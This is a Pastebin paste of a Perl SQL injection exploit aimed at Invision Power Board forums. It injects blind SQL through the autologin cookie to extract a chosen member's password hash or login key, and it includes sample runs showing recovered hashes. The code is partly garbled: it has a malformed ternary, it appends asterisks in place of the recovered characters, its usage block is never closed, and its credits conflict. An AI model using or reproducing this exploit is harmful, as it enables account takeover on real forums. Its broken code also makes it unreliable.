SHARE
TWEET

asda

a guest Jun 15th, 2011 731 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2.  
  3. ## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
  4. ## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
  5. ## tested on version 1 Final and version 3.1.4
  6. ## * work on all mysql versions
  7. ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
  8. ## (c)oded by 1dt.w0lf
  9. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10. ## screen:
  11. ## ~~~~~~~
  12. ## r57ipb3.pl blah.com /ipb13/ 1 0
  13. ## [~] SERVER : blah.com
  14. ## [~] PATH : /ipb13/
  15. ## [~] MEMBER ID : 1
  16. ## [~] TARGET : 0 - IPB 1.*
  17. ## [~] SEARCHING PASSWORD ... [ DONE ]
  18. ##
  19. ## MEMBER ID : 1
  20. ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
  21. ##
  22. ## r57ipb3.pl blah.com /ipb314/ 1 1
  23. ## [~] SERVER : blah.com
  24. ## [~] PATH : /ipb314/
  25. ## [~] MEMBER ID : 1
  26. ## [~] TARGET : 1 - IPB 2.*
  27. ## [~] SEARCHING PASSWORD ... [ DONE ]
  28. ##
  29. ## MEMBER ID : 1
  30. ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
  31. ##
  32. ## r57ipb3.pl blah.com /ipb314/ 1 1
  33. ## [~] SERVER : blah.com
  34. ## [~] PATH : /ipb314/
  35. ## [~] MEMBER ID : 1
  36. ## [~] TARGET : 1 - IPB 3.*
  37. ## [~] SEARCHING PASSWORD ... [ DONE ]
  38. ##
  39. ## MEMBER ID : 1
  40. ## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
  41. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  42. ## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
  43. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  44. ## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
  45. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  46.  
  47. use IO::Socket;
  48.  
  49. if (@ARGV < 4) { &usage; }
  50.  
  51. $server = $ARGV[0];
  52. $path = $ARGV[1];
  53. $member_id = $ARGV[2];
  54. $target = $ARGV[3];
  55.  
  56. $pass = ($target)?('member_login_key'):('password');
  57.  
  58. $server =~ s!(http:\/\/)!!;
  59.  
  60. $request = 'http://';
  61. $request .= $server;
  62. $request .= $path;
  63.  
  64. $s_num = 1;
  65. $|++;
  66. $n = 0;
  67.  
  68. print "[~] SERVER : $server\r\n";
  69. print "[~] PATH : $path\r\n";
  70. print "[~] MEMBER ID : $member_id\r\n";
  71. print "[~] TARGET : $target";
  72. print (($target)?(' - IPB 3.*'):(' - IPB 2.*'):(' - IPB 1.*'));
  73. print "\r\n";
  74. print "[~] SEARCHING PASSWORD ... [|]";
  75.  
  76. ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  77.  
  78. while(1)
  79. {
  80. if(&found(47,58)==0) { &found(96,122); }
  81. $char = $i;
  82. if ($char=="0")
  83. {
  84. if(length($allchar) > 0){
  85. print qq{\b\b DONE ]
  86.  
  87. MEMBER ID : $member_id
  88. };
  89. print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
  90. print $allchar."\r\n";
  91. }
  92. else
  93. {
  94. print "\b\b FAILED ]";
  95. }
  96. exit();
  97. }
  98. else
  99. {
  100. $allchar .= chr(42);
  101. }
  102. $s_num++;
  103. }
  104.  
  105. sub found($$)
  106. {
  107. my $fmin = $_[0];
  108. my $fmax = $_[1];
  109. if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
  110.  
  111. $r = int($fmax - ($fmax-$fmin)/2);
  112. $check = " BETWEEN $r AND $fmax";
  113. if ( &check($check) ) { &found($r,$fmax); }
  114. else { &found($fmin,$r); }
  115. }
  116.  
  117. sub crack($$)
  118. {
  119. my $cmin = $_[0];
  120. my $cmax = $_[1];
  121. $i = $cmin;
  122. while ($i<$cmax)
  123. {
  124. $crcheck = "=$i";
  125. if ( &check($crcheck) ) { return $i; }
  126. $i++;
  127. }
  128. $i = 0;
  129. return $i;
  130. }
  131.  
  132. sub check($)
  133. {
  134. $n++;
  135. status();
  136. $ccheck = $_[0];
  137. $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
  138. $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
  139. $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
  140. $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  141. $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
  142. $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
  143.  
  144. printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection:
  145.  
  146. close\n\n",
  147. $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
  148.  
  149. while(<$socket>)
  150. {
  151. if (/Set-Cookie: session_id=0;/) { return 1; }
  152. }
  153.  
  154. return 0;
  155. }
  156.  
  157. sub status()
  158. {
  159. $status = $n % 5;
  160. if($status==0){ print "\b\b/]"; }
  161. if($status==1){ print "\b\b-]"; }
  162. if($status==2){ print "\b\b\\]"; }
  163. if($status==3){ print "\b\b|]"; }
  164. }
  165.  
  166. sub usage()
  167. {
  168. print q(
  169. Invision Power Board v < 3.1.4 SQL injection exploit
  170. ----------------------------------------------------
  171. USAGE:
  172. ~~~~~~
  173. r57ipb3.pl [server] [/folder/] [member_id] [target]
  174.  
  175. [server] - host where IPB installed
  176. [/folder/] - folder where IPB installed
  177. [member_id] - user id for brute
  178.  
  179. targets:
  180. 0 - IPB 1.*
  181. 1 - IPB 2.*
  182. 2 - IPB 3.* (Prior To 3.1.4)
  183.  
  184. e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1
  185. ----------------------------------------------------
  186. print $target(' - IPB 3.*');
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top